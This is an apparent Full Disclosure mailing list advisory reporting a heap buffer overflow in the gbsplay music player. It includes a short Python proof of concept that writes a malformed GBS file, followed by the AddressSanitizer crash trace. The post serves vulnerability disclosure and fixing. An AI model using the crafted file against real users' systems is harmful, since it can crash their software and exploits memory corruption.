
Full Disclosure mailing list archives
gbsplay 0.0.100-18 Heap Buffer Overflow in update_status_on_subsong_change in gbsplay
From: Ron E <ronaldjedgerson () gmail com>
Date: Sat, 13 Sep 2025 09:41:12 -0400
A heap buffer overflow vulnerability exists in gbsplay 0.0.100-18-g50352f3 (latest development snapshot at the time of testing). When opening a crafted GBS file with inconsistent subsong metadata, the function update_status_on_subsong_change (gbs.c:501) reads past the bounds of a heap-allocated structure. The bug is triggered during subsong status update when the reported total_songs or subsong indices are malformed. AddressSanitizer (ASan) reports an out-of-bounds read of size 8 just before the allocated region. An attacker can exploit this vulnerability by tricking a victim into playing a malicious .gbs file. Depending on the environment, this may result in Denial of Service (DoS) (application crash) or potentially arbitrary code execution due to memory corruption. *Impact* - Immediate crash on crafted file. - Attackers may influence heap layout and overflow conditions. *Proof of Concept* Create a minimal, malformed GBS file: import struct, os with open("crash.gbs", "wb") as f: f.write(b"GBS" + bytes([1])) # Magic + version f.write(bytes([1])) # total_songs = 1 f.write(bytes([1])) # starting_song = 1 f.write(struct.pack("<HHHH", 0x4000, 0x4010, 0x4020, 0xFFFE)) f.write(bytes([0, 0])) f.write(b"PoC".ljust(32, b"\x00")*3) f.write(b"\x00"*0x1000) # pad ASAN_OPTIONS=abort_on_error=1,detect_leaks=0 \ UBSAN_OPTIONS=print_stacktrace=1 \ ./gbsplay -o stdout seeds/minimal.gbs *Observe crash:* ================================================================= ==690137==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x502000001308 at pc 0xaaaad32b29c4 bp 0xffffe6778f90 sp 0xffffe6778f88 READ of size 8 at 0x502000001308 thread T0 #0 0xaaaad32b29c0 in update_status_on_subsong_change /root/gbsplay/gbs.c:501:54 #1 0xaaaad32b21f8 in gbs_configure /root/gbsplay/gbs.c:131:2 #2 0xaaaad32a5584 in common_init /root/gbsplay/player.c:610:2 #3 0xaaaad329e220 in main /root/gbsplay/gbsplay.c:226:8 #4 0xffffaac62290 in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16 #5 0xffffaac62374 in __libc_start_main csu/../csu/libc-start.c:360:3 #6 0xaaaad31bedec in _start (/root/gbsplay/gbsplay+0x3edec) (BuildId: c8259c242d7a0acbf2dd69253dd04032772c13a3) _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
Current thread:
- gbsplay 0.0.100-18 Heap Buffer Overflow in update_status_on_subsong_change in gbsplay Ron E (Sep 15)